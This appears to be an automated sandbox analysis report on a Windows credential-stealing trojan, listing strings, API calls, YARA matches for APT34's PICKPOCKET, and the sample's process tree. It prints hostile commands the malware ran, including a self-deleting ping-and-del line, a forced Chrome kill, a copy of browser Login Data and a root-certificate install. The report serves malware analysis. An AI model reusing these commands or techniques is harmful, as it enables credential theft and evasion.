Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Code function: 9_2_0040AE4D OpenClipboard,

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Spam, unwanted Advertisements and Ransom Demands:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.6272167835D47591.exe.3350000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.6272167835D47591.exe.32e0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: N1yprTBBXs.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6272167835D47591.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001DA70: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004DC4D0 CloseHandle,_memset,CreateProcessAsUserW,GetLastError,CloseHandle,AssignProcessToJobObject,GetLastError,CloseHandle,SetThreadToken,ResumeThread,CloseHandle,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004EFF70
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F001D
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00478010
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0045E020
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00416030
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004510C0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004220D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004390A0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00502169
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0041F1E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004731E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0043D2D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0042B2A0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00460360
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B2370
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0041C3F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0047A410
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004714E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0046F4B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0043E540
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0048E560
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0045D570
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0044A520
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00423530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0042F530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00466530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004315E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B3660
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B5670
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0042E630
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B66D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004286E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004166B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00493790
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10009257
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10008340
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10010590
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B16A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B19B7F

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 2870F899F2E9EC540DA321F603CFB1A735DCD06DF016718E663DC78FEFDF5E0A

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: String function: 004854D0 appears 55 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: String function: 004EE38E appears 73 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: String function: 00407D80 appears 146 times

Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970727133.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970727133.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: N1yprTBBXs.exe, 00000000.00000002.267691642.0000000002BD0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000000.00000002.268393285.0000000002BE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000000.00000002.268416247.0000000002C30000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs N1yprTBBXs.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: N1yprTBBXs.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.2750000.2.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.2750000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.2880000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.2730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.2880000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.2730000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.3350000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.6272167835D47591.exe.32e0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/2

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Code function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00469760 CoCreateInstance,

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_0043D110 FindResourceW,LoadResource,LockResource,SizeofResource,_memmove,VerQueryValueW,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

File created: C:\Users\user\AppData\Local\Login Data1611970726180

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

File created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Jump to behavior

Source: N1yprTBBXs.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

System information queried: HandleInformation

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: N1yprTBBXs.exe	Virustotal: Detection: 38%
Source: N1yprTBBXs.exe	Metadefender: Detection: 18%
Source: N1yprTBBXs.exe	ReversingLabs: Detection: 59%

Source: N1yprTBBXs.exe

String found in binary or memory: GETpinyinhttp://tools.google.com/pinyin/install.htmlhttp://tools.google.com/pinyin/uninstall.htmlsysdictpinyinversion:http://tools.google.com/service/updatesysdicthttps://tools.google.com/service/updateGooglePinyinUpdaterTrayIconpinyinpinyinsysdictGooglePinyinDict.exesysdictuserdictmodel

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

File read: C:\Users\user\Desktop\N1yprTBBXs.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\N1yprTBBXs.exe 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1611970727133.exe 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Users\user\AppData\Roaming\1611970727133.exe 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
